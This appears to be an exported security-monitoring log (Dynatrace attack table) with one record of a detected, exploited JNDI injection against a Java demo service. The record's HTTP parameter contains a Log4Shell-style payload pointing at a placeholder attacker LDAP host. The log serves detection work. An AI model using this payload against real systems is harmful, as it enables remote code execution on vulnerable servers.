4.4 KiB
4.4 KiB
| 1 | TenantId | SourceSystem | MG | ManagementGroupName | TimeGenerated [UTC] | Computer | RawData | entrypoint_codeLocation_displayName_s | entrypoint_codeLocation_className_s | entrypoint_codeLocation_functionName_s | entrypoint_codeLocation_parameterTypes_values_s | entrypoint_codeLocation_parameterTypes_truncationInfo_truncated_b | entrypoint_codeLocation_returnType_s | entrypoint_codeLocation_lineNumber_d | attackId_s | displayId_s | timestamp_d | displayName_s | attackType_s | technology_s | state_s | request_url_s | request_path_s | request_protocolDetails_http_requestMethod_s | request_protocolDetails_http_headers_values_s | request_protocolDetails_http_headers_truncationInfo_s | request_protocolDetails_http_parameters_values_s | request_protocolDetails_http_parameters_truncationInfo_s | entrypoint_entrypointFunction_displayName_s | entrypoint_entrypointFunction_className_s | entrypoint_entrypointFunction_functionName_s | entrypoint_entrypointFunction_parameterTypes_values_s | entrypoint_entrypointFunction_parameterTypes_truncationInfo_truncated_b | entrypoint_entrypointFunction_returnType_s | entrypoint_payload_values_s | entrypoint_payload_truncationInfo_truncated_b | vulnerability_vulnerabilityId_s | vulnerability_displayName_s | vulnerability_codeLocation_displayName_s | vulnerability_codeLocation_className_s | vulnerability_codeLocation_functionName_s | vulnerability_codeLocation_parameterTypes_values_s | vulnerability_codeLocation_parameterTypes_truncationInfo_truncated_b | vulnerability_codeLocation_returnType_s | vulnerability_codeLocation_lineNumber_d | vulnerability_vulnerableFunction_displayName_s | vulnerability_vulnerableFunction_className_s | vulnerability_vulnerableFunction_functionName_s | vulnerability_vulnerableFunction_parameterTypes_values_s | vulnerability_vulnerableFunction_parameterTypes_truncationInfo_truncated_b | vulnerability_vulnerableFunction_returnType_s | vulnerability_vulnerableFunctionInput_type_s | vulnerability_vulnerableFunctionInput_inputSegments_s | attacker_sourceIp_s | attacker_location_countryCode_s | attacker_location_country_s | attacker_location_city_s | managementZones_s | Type | _ResourceId |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2 | 0466271e-77e0-47ef-bc01-ee8177ca53ee | OpsManager | 27/10/2023, 11:17:35.044 | 1698405124415_02195243643866821550 | A-22DAIC | 1698405124415 | javax.servlet.ServletRequestWrapper.getParameterValues() | JNDI_INJECTION | JAVA | EXPLOITED | / | / | GET | [{"name":"x-client-ip","value":"192.168.1.1"},{"name":"user-agent","value":"axios/0.20.0"},{"name":"host","value":"unguard-proxy-service"},{"name":"accept","value":"application/json, text/plain, */*"},{"name":"x-dynatrace","value":"FW4;-1743916453;7;-359533746;498416;2;-860574453;372;d30e;2h02;3h87179aa2;4h0f4988;5h01;6heed8e7bffd3835c46961d6ded2ae3e75;7h59eb10f60139ab11"},{"name":"traceparent","value":"00-eed8e7bffd3835c46961d6ded2ae3e75-59eb10f60139ab11-01"},{"name":"tracestate","value":"ccb4ad0b-980df25b@dt=fw4;7;ea91f34e;79af0;2;0;0;174;a886;2h02;3h87179aa2;4h0f4988;5h01;7h59eb10f60139ab11"},{"name":"connection","value":"close"}] | {"truncated":false} | [] | {"truncated":true} | ServletRequestWrapper.getParameterValues(String) | javax.servlet.ServletRequestWrapper | getParameterValues | ["String"] | false | java.lang.String[] | [{"type":"HTTP_PARAMETER_VALUE","name":"url","value":"${jndi:ldap://evil-server.net:999/CompromiseMachine}"}] | false | -7037978146758609592 | JndiManager.lookup():128 | org.apache.logging.log4j.core.net.JndiManager.lookup(String):128 | org.apache.logging.log4j.core.net.JndiManager | lookup | ["String"] | false | java.lang.Object | 128 | InitialContext.lookup(String) | javax.naming.InitialContext | lookup | ["String"] | false | java.lang.Object | JNDI | [{"value":"ldap://evil-server.net:999/CompromiseMachine","type":"MALICIOUS_INPUT"}] | 192.168.1.1 | DE | Germany | Rottenburg | [{"id":"2843874372046580667","name":"Dev2Dev Demo 2"},{"id":"2631544906797876001","name":"Infrastructure Linux (incl PG)"},{"id":"5996194749094481086","name":"XXXXX-TestZone"},{"id":"1674365597043557983","name":"XXXX Test"},{"id":"8696294048462936180","name":"excemptions test"},{"id":"8097065485878182312","name":"java"},{"id":"-8367998469205081223","name":"pgTestMz"},{"id":"-2661345213750943630","name":"XXXXX-java-MZ"},{"id":"-432603006836851299","name":"XXXX-mz"},{"id":"5322819311624991300","name":"unguard"}] | DynatraceAttacks_CL |